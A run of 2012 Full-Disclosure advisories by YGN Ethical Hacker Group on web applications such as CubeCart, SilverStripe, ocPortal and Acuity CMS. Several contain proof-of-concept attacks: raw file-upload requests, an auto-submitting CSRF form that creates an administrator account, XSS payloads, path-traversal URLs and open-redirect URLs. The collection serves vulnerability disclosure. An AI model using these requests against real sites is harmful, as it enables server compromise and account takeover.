http://yehg.net/hwd ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CubeCart 4.4.6 and lower | Local File Inclusion Vulnerability
1. OVERVIEW CubeCart 4.4.6 and lower versions are vulnerable to Local File Inclusion. 2. BACKGROUND CubeCart is an out of the box ecommerce shopping cart software solution which has been written to run on servers that have PHP MySQL support. With CubeCart you can quickly setup a powerful online store which can be used to sell digital or tangible products to new and existing customers all over the world. 3. VULNERABILITY DESCRIPTION CubeCart 4.4.6 and lower versions contain a flaw that may allow a remote attacker to execute arbitrary commands or code. The issue is due to the '/admin.php' script not properly sanitizing user input, specifically directory traversal style attacks (e.g., ../../) supplied to the 'loc' parameter. This may allow an attacker to include a file from the targeted host that contains arbitrary commands or code that will be executed by the vulnerable script. Such attacks are limited due to the script only calling files already on the target host. In addition, this flaw can potentially be used to disclose the contents of any file on the system accessible by the web server. 4. VERSIONS AFFECTED 4.4.6 and lower 5. Affected URL and Parameter /admin.php (loc parameter) /admin.php?_g=filemanager/languageloc=/../../../public_ftp/uploads/hack.inc.php 6. SOLUTION The CubeCart 4.x version family is no longer maintained by the vendor. Upgrade to the currently supported latest CubeCart version - 5.x. 7. VENDOR CubeCart Development Team http://cubecart.com/ 8. CREDIT Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar. 9. DISCLOSURE TIME-LINE 2012-12-22: CubeCart 4.x in End-of-Support/Maintenance circle 2012-12-24: Vulnerability disclosed 10. REFERENCES Original Advisory URL: http://yehg.net/lab/pr0js/advisories/%5Bcubecart_4.4.6%5D_lfi CubeCart Home Page: http://cubecart.com/ CubeCart Bug-Fix Announcement: http://forums.cubecart.com/topic/45456-cubecart-447-released/ CubeCart4 End-of-Life Announcement: http://forums.cubecart.com/topic/46765-cubecart-v4-end-of-life-saturday-22-december/ #yehg [2012-12-24] - Best regards, YGN Ethical Hacker Group Yangon, Myanmar http://yehg.net Our Lab | http://yehg.net/lab Our Directory | http://yehg.net/hwd ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CubeCart 4.x/5.x | Setup Re-installation Privilege Escalation Vulnerability
1. OVERVIEW CubeCart 4.x and 5.x versions are vulnerable to Setup Re-installation Privilege Escalation. 2. BACKGROUND CubeCart is an out of the box ecommerce shopping cart software solution which has been written to run on servers that have PHP MySQL support. With CubeCart you can quickly setup a powerful online store which can be used to sell digital or tangible products to new and existing customers all over the world. 3. VULNERABILITY DESCRIPTION CubeCart 4.x and 5.x versions contain a flaw that does not remove set-up installation directory or warn users of the existence of set-up installation directory. This allows an attacker to re-install the application, gain administrator access and do malicious things such as uploading malicious shell script to compromise the application server. 4. VERSIONS AFFECTED CubeCart 4.x and 5.x 5. Affected URL N.A 6. SOLUTION/WORKAROUND The vendor has chosen not to fix the issue. Workaround is to remove setup directory after installation. 7. VENDOR CubeCart Development Team http://cubecart.com/ 8. CREDIT Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar. 9. DISCLOSURE TIME-LINE 2012-03-24: Vulnerability Reported 2012-12-24: Vulnerability disclosed 10. REFERENCES Original Advisory URL: http://yehg.net/lab/pr0js/advisories/%5Bcubecart_4x5x%5D_setup_re-install-priv-esclate CubeCart Home Page: http://cubecart.com/ #yehg [2012-12-24] - Best regards, YGN Ethical Hacker Group Yangon, Myanmar http://yehg.net Our Lab | http://yehg.net/lab Our Directory | http://yehg.net/hwd ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CubeCart 4.4.6 and lower | Open URL Redirection Vulnerability
1. OVERVIEW CubeCart 4.4.6 and lower versions are vulnerable to Open URL Redirection. 2. BACKGROUND CubeCart is an out of the box ecommerce shopping cart software solution which has been written to run on servers that have PHP MySQL support. With CubeCart you can quickly setup a powerful online store which can be used to sell digital or tangible products to new and existing customers all over the world. 3. VULNERABILITY DESCRIPTION CubeCart 4.4.6 and lower versions contain a flaw that allows a remote cross site redirection attack. This flaw exists because the application does not properly sanitise the parameters, r and redir. This allows an attacker to create a specially crafted URL, that if clicked, would redirect a victim from the intended legitimate web site to an arbitrary web site of the attacker's choice. 4. VERSIONS AFFECTED 4.4.6 and lower 5. Affected URLs and Parameters /index.php (r parameter) /index.php (redir parameter) /index.php?_g=swr=//yehg.net/ /index.php?_a=loginredir=//yehg.net 6. SOLUTION The CubeCart 4.x version family is no longer maintained by the vendor. Upgrade to the currently supported latest latest CubeCart version - 5.x. 7. VENDOR CubeCart Development Team http://cubecart.com/ 8. CREDIT Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar. 9. DISCLOSURE TIME-LINE 2012-06-22: CubeCart 4.x in End-of-Support/Maintenance circle 2012-12-24: Vulnerability disclosed 10. REFERENCES Original Advisory URL: http://yehg.net/lab/pr0js/advisories/%5Bcubecart_4.4.6%5D_open_url_redirection CubeCart Home Page: http://cubecart.com/ CubeCart Bug-Fix Announcement: http://forums.cubecart.com/topic/45456-cubecart-447-released/ CubeCart4 End-of-Life Announcement: http://forums.cubecart.com/topic/46765-cubecart-v4-end-of-life-saturday-22-december/ #yehg [2012-12-24] - Best regards, YGN Ethical Hacker Group Yangon, Myanmar http://yehg.net Our Lab | http://yehg.net/lab Our Directory | http://yehg.net/hwd ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CubeCart 3.0.20 (3.0.x) and lower | Multiple SQL Injection Vulnerabilities
1. OVERVIEW The CubeCart 3.0.20 and lower versions are vulnerable to SQL Injection. 2. BACKGROUND CubeCart is an out of the box ecommerce shopping cart software solution which has been written to run on servers that have PHP MySQL support. With CubeCart you can quickly setup a powerful online store which can be used to sell digital or tangible products to new and existing customers all over the world. 3. VULNERABILITY DESCRIPTION Multiple parameters are not properly sanitized, which allows attacker to conduct SQL Injection attack. This could an attacker to inject or manipulate SQL queries in the back-end database, allowing for the manipulation or disclosure of arbitrary data. 4. VERSIONS AFFECTED 3.0.20 and lower (aka 3.0.x family) 5. Affected URLs and Parameters //cube/admin/products/extraCats.php (add parameter) /cube/admin/products/index.php (cat_id parameter) /cube/admin/products/index.php (category parameter) /cube/admin/products/index.php (orderCol parameter) /cube/admin/products/index.php (orderDir parameter) /cube/admin/products/options.php (masterProduct parameter) /cube/admin/settings/currency.php (active parameter) 6. SOLUTION The CubeCart 3.0.x version family is no longer maintained by the vendor. Upgrade to the currently supported CubeCart version - 5.x. 7. VENDOR CubeCart Development Team http:/cart.com/ 8. CREDIT Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar. 9. DISCLOSURE TIME-LINE 2012-02-10: CubeCart 3.0.x in End-of-Support/Maintenance circle 2012-12-22: Vulnerability disclosed 10. REFERENCES Original Advisory URL: http://yehg.net/lab/pr0js/advisories/%5Bcubecart_3.0.20_3.0x%5D_sqli CubeCart Home Page: http://cubecart.com/ #yehg [2012-12-22] - Best regards, YGN Ethical Hacker Group Yangon, Myanmar http://yehg.net Our Lab | http://yehg.net/lab Our Directory | http://yehg.net/hwd ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CubeCart 3.0.20 (3.0.x) and lower | Arbitrary File Upload
1. OVERVIEW CubeCart 3.0.20 and lower versions are vulnerable to Arbitrary File Upload. 2. BACKGROUND CubeCart is an out of the box ecommerce shopping cart software solution which has been written to run on servers that have PHP MySQL support. With CubeCart you can quickly setup a powerful online store which can be used to sell digital or tangible products to new and existing customers all over the world. 3. VULNERABILITY DESCRIPTION CubeCart 3.0.20 and lower versions contain a flaw related to the /admin/filemanager/upload.php script's failure to properly validate uploaded files. This may allow a remote attacker to upload arbitrary files and execute arbitrary code via a request to the 'atm-regen' parameter. 4. VERSIONS AFFECTED 3.0.20 and lower (aka 3.0.x family) 5. PROOF-OF-CONCEPT/EXPLOIT Set content type to image/jpeg and upload. Uploaded files are stored at images/uploads. / POST /cube/admin/filemanager/upload.php HTTP/1.1 Host:localhost Referer: http://localhost/cube/admin/filemanager/upload.php?custom=1redir=0 Cookie: ccSIDb4c410adddf67168ce2ac0e2807326f8=f2c0bc69b813778a644b76c2b40c7ce0; Content-Type: multipart/form-data; boundary=---24464570528145 Content-Length: 29 -24464570528145 Content-Disposition: form-data; name=FCKeditor_File; filename=cmd.php Content-Type: image/jpeg ?php info();? -24464570528145 Content-Disposition: form-data; name=submit Upload Image -24464570528145 Content-Disposition: form-data; name=redir 0 -24464570528145 Content-Disposition: form-data; name=custom 1 -24464570528145-- /// 6. SOLUTION The CubeCart 3.0.x version family is no longer maintained by the vendor. Upgrade to the currently supported CubeCart version - 5.x. 7. VENDOR CubeCart Development Team http:/cart.com/ 8. CREDIT Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar. 9. DISCLOSURE TIME-LINE 2012-02-10: CubeCart 3.0.x in End-of-Support/Maintenance circle 2012-12-22: Vulnerability disclosed 10. REFERENCES Original Advisory URL: http://yehg.net/lab/pr0js/advisories/%5Bcubecart_3.0.20_3.0x%5D_arbitrary_file_upload CubeCart Home Page: http://cubecart.com/ #yehg [2012-12-22] - Best regards, YGN Ethical Hacker Group Yangon, Myanmar http://yehg.net Our Lab | http://yehg.net/lab Our Directory | http://yehg.net/hwd ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CubeCart 3.0.20 (3.0.x) and lower | Multiple Cross Site Scripting Vulnerabilities
(folder parameter) /admin/modules/gateway/PayOffline/index.php (module parameter) /admin/modules/gateway/PayPal/index.php (folder parameter) /admin/modules/gateway/PayPal/index.php (module parameter) /admin/modules/gateway/Print_Order_Form/index.php (folder parameter) /admin/modules/gateway/Print_Order_Form/index.php (module parameter) /admin/modules/gateway/Protx/index.php (folder parameter) /admin/modules/gateway/Protx/index.php (module parameter) /admin/modules/gateway/psiGate/index.php(folder parameter) /admin/modules/gateway/psiGate/index.php(module parameter) /admin/modules/gateway/SECPay/index.php (folder parameter) /admin/modules/gateway/SECPay/index.php (module parameter) /admin/modules/gateway/VelocityPay/index.php(folder parameter) /admin/modules/gateway/VelocityPay/index.php(module parameter) /admin/modules/gateway/Verisign/index.php (folder parameter) /admin/modules/gateway/Verisign/index.php (module parameter) /admin/modules/shipping/By_Percent/index.php(folder parameter) /admin/modules/shipping/By_Percent/index.php(module parameter) /admin/modules/shipping/By_Price/index.php (folder parameter) /admin/modules/shipping/By_Price/index.php (module parameter) /admin/modules/shipping/By_Weight/index.php (folder parameter) /admin/modules/shipping/By_Weight/index.php (module parameter) /admin/modules/shipping/Flat_Rate/index.php (folder parameter) /admin/modules/shipping/Flat_Rate/index.php (module parameter) /admin/modules/shipping/Free_Shipping/index.php (folder parameter) /admin/modules/shipping/Free_Shipping/index.php (module parameter) /admin/modules/shipping/Per_Category/index.php (folder parameter) /admin/modules/shipping/Per_Category/index.php (module parameter) /admin/modules/shipping/Per_Item/index.php (folder parameter) /admin/modules/shipping/Per_Item/index.php (module parameter) /admin/modules/shipping/Royal_Mail/index.php(folder parameter) /admin/modules/shipping/Royal_Mail/index.php(module parameter) /admin/products/extraCats.php (add parameter) /admin/products/extraCats.php (name parameter) /admin/products/index.php (cat_id parameter) /admin/products/index.php (cat_name parameter) /admin/products/index.php (category parameter) /admin/products/index.php (name parameter) /admin/products/index.php (orderCol parameter) /admin/products/index.php (orderDir parameter) /admin/products/index.php (taxName parameter) /admin/products/languages.php (prod_master_id parameter) /admin/products/options.php (attribute parameter) /admin/products/options.php (name parameter) /admin/settings/currency.php(active parameter) /admin/settings/currency.php(name parameter) /admin/settings/geo.php (iso parameter) /admin/settings/geo.php (iso3 parameter) /admin/settings/geo.php (name parameter) /admin/settings/geo.php (numcode parameter) /admin/settings/geo.php (printable_name parameter) /admin/settings/tax.php (taxName parameter) /cart.php?act=cart (HTTP Referer) /index.php (add_1 parameter) /index.php (add_2 parameter) /index.php (county parameter) /index.php (firstName parameter) /index.php (lastName parameter) /index.php (mobile parameter) /index.php (town parameter) 6. SOLUTION The CubeCart 3.0.x version family is no longer maintained by the vendor. Upgrade to the currently supported CubeCart version - 5.x. 7. VENDOR CubeCart Development Team http:/cart.com/ 8. CREDIT Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar. 9. DISCLOSURE TIME-LINE 2012-02-10: CubeCart 3.0.x in End-of-Support/Maintenance circle 2012-12-22: Vulnerability disclosed 10. REFERENCES Original Advisory URL: http://yehg.net/lab/pr0js/advisories/%5Bcubecart_3.0.20_3.0x%5D_xss CubeCart Home Page: http://cubecart.com/ #yehg [2012-12-22] - Best regards, YGN Ethical Hacker Group Yangon, Myanmar http://yehg.net Our Lab | http://yehg.net/lab Our Directory | http://yehg.net/hwd ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Open-Realty CMS 2.5.8 (2.x.x) = Cross Site Request Forgery (CSRF) Vulnerability
1. OVERVIEW Open-Realty 2.5.8 and lower versions are vulnerable to Cross Site Request Forgery. 2. BACKGROUND Open-Realty is the world's leading real estate listing marketing and management CMS application, and has enjoyed being the real estate web site software of choice for professional web site developers since 2002. 3. VULNERABILITY DESCRIPTION Open-Realty 2.5.8 and lower versions contain a flaw that allows a remote Cross-site Request Forgery (CSRF / XSRF) attack. The flaw exists because the application does not require multiple steps or explicit confirmation for sensitive transactions for majority of administrator functions such as adding new user, assigning user to administrative privilege. By using a crafted URL, an attacker may trick the victim into visiting to his web page to take advantage of the trust relationship between the authenticated victim and the application. Such an attack could trick the victim into executing arbitrary commands in the context of their session with the application, without further prompting or verification. 4. VERSIONS AFFECTED 2.5.8 (2.x.x) = 5. PROOF-OF-CONCEPT/EXPLOIT !-- Add Admin User -- form action=http://localhost/orealty/admin/index.php?action=user_manager; method=POST input type=hidden name=action value=createNewUser / input type=hidden name=edit#95;user#95;name value=user / input type=hidden name=edit#95;user#95;pass value=pa55w0rd / input type=hidden name=edit#95;user#95;pass2 value=pa55w0rd / input type=hidden name=user#95;first#95;name value=hacker / input type=hidden name=user#95;last#95;name value=smith / input type=hidden name=user#95;email value=hacker#64;yehg#46;net / input type=hidden name=edit#95;active value=yes / input type=hidden name=edit#95;isAdmin value=yes / input type=hidden name=edit#95;isAgent value=yes / input type=hidden name=limitListings value=#45;1 / input type=hidden name=edit#95;limitFeaturedListings value=#45;1 / input type=hidden name=edit#95;userRank value=0 / input type=hidden name=edit#95;canEditAllListings value=yes / input type=hidden name=edit#95;canEditAllUsers value=yes / input type=hidden name=edit#95;canEditSiteConfig value=yes / input type=hidden name=edit#95;canEditMemberTemplate value=yes / input type=hidden name=edit#95;canEditAgentTemplate value=yes / input type=hidden name=edit#95;canEditPropertyClasses value=yes / input type=hidden name=edit#95;canEditListingTemplate value=yes / input type=hidden name=edit#95;canViewLogs value=yes / input type=hidden name=edit#95;canModerate value=yes / input type=hidden name=edit#95;canFeatureListings value=yes / input type=hidden name=edit#95;canEditListingExpiration value=yes / input type=hidden name=edit#95;canExportListings value=no / input type=hidden name=edit#95;canPages value=yes / input type=hidden name=edit#95;canVtour value=yes / input type=hidden name=edit#95;canFiles value=yes / input type=hidden name=edit#95;canUserFiles value=yes / input type=hidden name=edit#95;canManageAddons value=yes / scriptdocument.forms[0].submit()/script /form 6. SOLUTION The vendor has been reported to have discontinued this product and therefore has no patch or upgrade that mitigates this problem. It is recommended that an alternate software package be used in its place. 7. VENDOR Transparent Technologies Inc. http://www.transparent-support.com 8. CREDIT Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar. 9. DISCLOSURE TIME-LINE 2012-03-05: Open-Realty 2.5.8 in End-of-Support/Maintenance circle 2012-11-17: Vulnerability disclosed 10. REFERENCES Original Advisory URL: http://yehg.net/lab/pr0js/advisories/%5Bopen-realty_2.5.8_2.x%5D_csrf Open-Realty Home Page: http://www.open-realty.org/ #yehg [2012-11-17] - Best regards, YGN Ethical Hacker Group Yangon, Myanmar http://yehg.net Our Lab | http://yehg.net/lab Our Directory | http://yehg.net/hwd ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] F5 FirePass SSL VPN 4xxx Series | Arbitrary URL Redirection
1. OVERVIEW F5 FirePass SSL VPN is vulnerable to Open URL Redirection. 2. BACKGROUND F5 FirePass SSL VPN provides secure remote access to enterprise applications and data for users over any device or network while protecting your corporate. (See http://www.f5.com/pdf/products/firepass-overview.pdf) 3. VULNERABILITY DESCRIPTION F5 FirePass SSL VPN contains a flaw that allows a remote cross site redirection attack. This flaw exists because the application does not validate the refreshURL parameter upon submission to the my.activation.cns.php3 script. This could allow a user to create a specially crafted URL, that if clicked, would redirect a victim from the intended legitimate web site to an arbitrary web site of the attacker's choosing. 4. VERSIONS AFFECTED 4xxx Series 5. PROOF-OF-CONCEPT/EXPLOIT https://[VPN_HOST]/my.activation.cns.php3?langchar=ui_translation=refreshURL=http://yehg.net/ 6. SOLUTION We have not been informed of the fix. We believe this issue should be fixed by the time of releasing our advisory. 7. VENDOR F5 Networks, Inc. 8. CREDIT This vulnerability was discovered by Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar. 9. DISCLOSURE TIME-LINE 2012-03-31: notified vendor 2012-04-04: vendor acknowledged 2012-10-20: vulnerability disclosed 10. REFERENCES Original Advisory URL: http://yehg.net/lab/pr0js/advisories/%5BF5_firepass4x%5D_url_redirection OWASP Top 10 2010 - A 10: http://www.owasp.org/index.php/Top_10_2010-A10-Unvalidated_Redirects_and_Forwards SANS Top 25 - Rank 23: http://cwe.mitre.org/top25/#CWE-601 CWE-601: http://cwe.mitre.org/data/definitions/601.html #yehg [2012-10-20] - Best regards, YGN Ethical Hacker Group Yangon, Myanmar http://yehg.net Our Lab | http://yehg.net/lab Our Directory | http://yehg.net/hwd ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] SilverStripe CMS 2.4.7 = Arbitrary URL Redirection
1. OVERVIEW SilverStripe 2.4.7 and lower versions are vulnerable to Open URL Redirection. 2. BACKGROUND SilverStripe CMS is easy for both developers and content authors to work with. The SilverStripe Framework keeps the code tucked away neatly so that it can be accessed easily by programmers but does not get in the way of content authors. 3. VULNERABILITY DESCRIPTION SilverStripe CMS contains a flaw that allows a remote cross site redirection attack. This flaw exists because the application does not validate the BackURL parameter upon submission to the /index.php/Security/login script. This could allow a user to create a specially crafted URL, that if clicked, would redirect a victim from the intended legitimate web site to an arbitrary web site of the attacker's choosing. 4. VERSIONS AFFECTED Tested on 2.4.7 5. PROOF-OF-CONCEPT/EXPLOIT http://localhost/index.php/Security/login?BackURL=//yehg.net 6. SOLUTION Upgrade to the latest 3.x version. 7. VENDOR SilverStripe Development Team http://www.silverstripe.org/ 8. CREDIT This vulnerability was discovered by Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar. 9. DISCLOSURE TIME-LINE 2012-02-06: notified vendor 2012-10-15: vulnerability disclosed 10. REFERENCES Original Advisory URL: http://yehg.net/lab/pr0js/advisories/%5BSilverStripe_2.4.7%5D_url_redirection #yehg [2012-10-15] - Best regards, YGN Ethical Hacker Group Yangon, Myanmar http://yehg.net Our Lab | http://yehg.net/lab Our Directory | http://yehg.net/hwd ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] SilverStripe CMS 2.4.7 = Persistent Cross Site Scripting Vulnerability
1. OVERVIEW SilverStripe 2.4.7 and lower versions are vulnerable to Persistent Cross Site Scripting. 2. BACKGROUND SilverStripe CMS is easy for both developers and content authors to work with. The SilverStripe Framework keeps the code tucked away neatly so that it can be accessed easily by programmers but does not get in the way of content authors. 3. VULNERABILITY DESCRIPTION The Title parameter was not properly sanitized upon submission to /index.php/admin/security/EditForm/field/Roles/AddForm and /index.php/admin/RootForm urls, which allows attacker to conduct Cross Site Scripting attack. This may allow an attacker to create a specially crafted URL that would execute arbitrary script code in a victim's browser. 4. VERSIONS AFFECTED Tested on 2.4.7 5. PROOF-OF-CONCEPT/EXPLOIT POST /index.php/admin/security/EditForm/field/Roles/AddForm?SecurityID=[ID] HTTP/1.1 Host: localhost Referer: http://localhost/index.php/admin/security/EditForm/field/Roles/add?SecurityID=[ID] Cookie: PHPSESSID=1e4ea938f83b04bc826231987cedc050; Content-Type: application/x-www-form-urlencoded Content-Length: 146 Title=%27%22%3E%3Cscript%3Ealert%28%2Fxss%2F%29%3C%2Fscript%3Ectf%5BClassName%5D=PermissionRoleSecurityID=[ID]action_saveComplexTableField=Save POST /index.php/admin/RootForm HTTP/1.1 Host: localhost Proxy-Connection: keep-alive X-Requested-With: XMLHttpRequest X-Prototype-Version: 1.4.0_rc3 Content-Type: application/x-www-form-urlencoded; charset=utf-8 Referer: http://localhost/index.php/admin/ Content-Length: 256 Cookie: PHPSESSID=25c8f4060c398d05732fe494eb3ad4f1; Pragma: no-cache Cache-Control: no-cache Title='%22%3E%3Cscript%3Ealert(%2Fxss1%2F)%3C%2Fscript%3ETagline=testCanViewType=AnyoneViewerGroups=CanEditType=LoggedInUsersEditorGroups=CanCreateTopLevelType=LoggedInUsersCreateTopLevelGroups=SecurityID=[ID]Theme=ajax=0action_save_siteconfig=1 6. SOLUTION Upgrade to the latest 3.x version. 7. VENDOR SilverStripe Development Team http://www.silverstripe.org/ 8. CREDIT This vulnerability was discovered by Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar. 9. DISCLOSURE TIME-LINE 2012-02-06: notified vendor 2012-10-15: vulnerability disclosed 10. REFERENCES Original Advisory URL: http://yehg.net/lab/pr0js/advisories/%5BSilverStripe_2.4.7%5D_xss #yehg [2012-10-15] - Best regards, YGN Ethical Hacker Group Yangon, Myanmar http://yehg.net Our Lab | http://yehg.net/lab Our Directory | http://yehg.net/hwd ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] ocPoral CMS 8.x | Session Hijacking Vulnerability
1. OVERVIEW ocPoral CMS 8.x and lower versions are vulnerable to Session Hijacking flaw which could allow attackers to compromise administrator session. 2. PRODUCT DESCRIPTION ocPortal is the website Content Management System (a CMS) for building and maintaining a dynamic website. ocPortal's powerful feature-set means there's always a way to accomplish your vision. Not only does ocPortal's CMS have all the features you'd expect: for instance photo galleries, news, file downloads and community forums/chats, but it does so whilst meeting the highest accessibility and professional standards. It is also smart enough to go beyond page management, to automatically handle search engine optimisation, and provide aggressive hack attack prevention. 3. VULNERABILITY DESCRIPTION The ocPoral CMS generates 7-digit session IDs for logged-in users; thus it is possible to work out a valid session ID through brute forcing. Successful hijacking requires the Enforce IP addresses for sessions option be disabled. However, when a user's IP is highly dynamic, this option will likely to be disabled as it would invalidate logged-in sessions. In other way, if a user and an attacker happened to be within the same subnet, the attack would succeed regardless of the Enforce IP setting turning on. 4. VERSIONS AFFECTED Tested on version 8.1.2 5. PROOF-OF-CONCEPT/EXPLOIT sample session cookie: ocp_session=8711789 6. SOLUTION No fix is available as of 2012-08-19. Workaround is to set enabled for the option, Enforce IP addresses for sessions. 7. VENDOR ocPortal Development Team http://www.ocportal.com/ 8. CREDIT This vulnerability was discovered by Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar. 9. DISCLOSURE TIME-LINE 2012-07-29: notified vendor, vendor did not plan to release fix because of default deployed workaround 2012-08-19: vulnerability disclosed 10. REFERENCES Original Advisory URL: http://yehg.net/lab/pr0js/advisories/2wire/%5Bocportal_8x%5D_session_hijacking_vulnerability #yehg [2012-08-19] ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] ocPortal 7.1.5 = | Open URL Redirection Vulnerability
1. OVERVIEW ocPoral CMS 7.1.5 and lower versions are vulnerable to Open URL Redirection. 2. BACKGROUND ocPortal is the website Content Management System (a CMS) for building and maintaining a dynamic website. ocPortal's powerful feature-set means there's always a way to accomplish your vision. Not only does ocPortal's CMS have all the features you'd expect: for instance photo galleries, news, file downloads and community forums/chats, but it does so whilst meeting the highest accessibility and professional standards. It is also smart enough to go beyond page management, to automatically handle search engine optimisation, and provide aggressive hack attack prevention. 3. VULNERABILITY DESCRIPTION ocPoral CMS 7.1.5 and lower versions contain a flaw that allows a remote cross site redirection attack. This flaw exists because the application does not properly sanitise the redirect parameter. This allows an attacker to create a specially crafted URL, that if clicked, would redirect a victim from the intended legitimate web site to an arbitrary web site of the attacker's choice. 4. VERSIONS AFFECTED Tested on 7.1.5 5. PROOF-OF-CONCEPT/EXPLOIT http://localhost/ocportal/index.php?page=logintype=miscredirect=http://attacker.in 6. SOLUTION Upgrade to the latest version. 7. VENDOR ocPortal Development Team http://www.ocportal.com/ 8. CREDIT Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar. 9. DISCLOSURE TIME-LINE 2012-03-06: notified vendor 2012-03-21: patched version,7.1.6, released 2012-07-29: vulnerability disclosed 10. REFERENCES Original Advisory URL: http://yehg.net/lab/pr0js/advisories/%5Bocportal_7x%5D_open_url_redirection #yehg [2012-07-29] ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Acuity CMS 2.6.x = Arbitrary File Upload
1. OVERVIEW Acuity CMS 2.6.x (ASP-based) versions are vulnerable to Arbitrary File Upload. 2. BACKGROUND Acuity CMS is a powerful but simple, extremely easy to use, low priced, easy to deploy content management system. It is a leader in its price and feature class. 3. VULNERABILITY DESCRIPTION Acuity CMS 2.6.x (ASP-based) version contain a flaw that may allow an attacker to upload .asp/.aspx files without restrictions, which will execute ASP(.Net) codes. The issue is due to the script, /admin/file_manager/file_upload_submit.asp , not properly sanitizing 'file1', 'file2', 'file3', 'fileX' parameters. 4. VERSIONS AFFECTED Tested with version 2.6.2. 5. PROOF-OF-CONCEPT/EXPLOIT [REQUEST] POST /admin/file_manager/file_upload_submit.asp HTTP/1.1 Host: localhost Cookie: ASPSESSIONID=XXX -6dc3a236402e2 Content-Disposition: form-data; name=path /images -6dc3a236402e2 Content-Disposition: form-data; name=rootpath / -6dc3a236402e2 Content-Disposition: form-data; name=rootdisplay http://localhost/ -6dc3a236402e2 Content-Disposition: form-data; name=status confirmed -6dc3a236402e2 Content-Disposition: form-data; name=action fileUpload -6dc3a236402e2 Content-Disposition: form-data; name=file1; filename=0wned.asp Content-Type: application/octet-stream % response.write(0wned!) % -6dc3a236402e2-- [/REQUEST] 6. SOLUTION The Acunity CMS is no longer in active development. It is recommended to user another CMS in active development and support. 7. VENDOR The Collective http://www.thecollective.com.au/ 8. CREDIT Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar. 9. DISCLOSURE TIME-LINE 2012-05-20: vulnerability disclosed 10. REFERENCES Original Advisory URL: http://yehg.net/lab/pr0js/advisories/%5Bacuity_cms2.6%20x_(asp)%5D_arbitrary_fileupload #yehg [2012-05-20] ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Acuity CMS 2.6.x = Path Traversal Arbitrary File Access
1. OVERVIEW Acuity CMS 2.6.x (ASP-based) versions are vulnerable to Path Traversal. 2. BACKGROUND Acuity CMS is a powerful but simple, extremely easy to use, low priced, easy to deploy content management system. It is a leader in its price and feature class. 3. VULNERABILITY DESCRIPTION The issue is due to the script, /admin/file_manager/browse.asp, not properly sanitizing user input, specifically directory traversal style attacks (e.g., ../../) supplied via the 'path' parameter. It would allow the attacker to access arbitrary files outside of web root directory. 4. VERSIONS AFFECTED Tested with version 2.6.2. 5. PROOF-OF-CONCEPT/EXPLOIT http://localhost/admin/file_manager/browse.asp?field=form=path=../../ 6. SOLUTION The Acunity CMS is no longer in active development. It is recommended to user another CMS in active development and support. 7. VENDOR The Collective http://www.thecollective.com.au/ 8. CREDIT Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar. 9. DISCLOSURE TIME-LINE 2012-05-20: vulnerability disclosed 10. REFERENCES Original Advisory URL: http://yehg.net/lab/pr0js/advisories/%5Bacuity_cms2.6%20x_(asp)%5D_path_traversal #yehg [2012-05-20] ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Acuity CMS 2.6.x = Path Traversal Arbitrary File Access
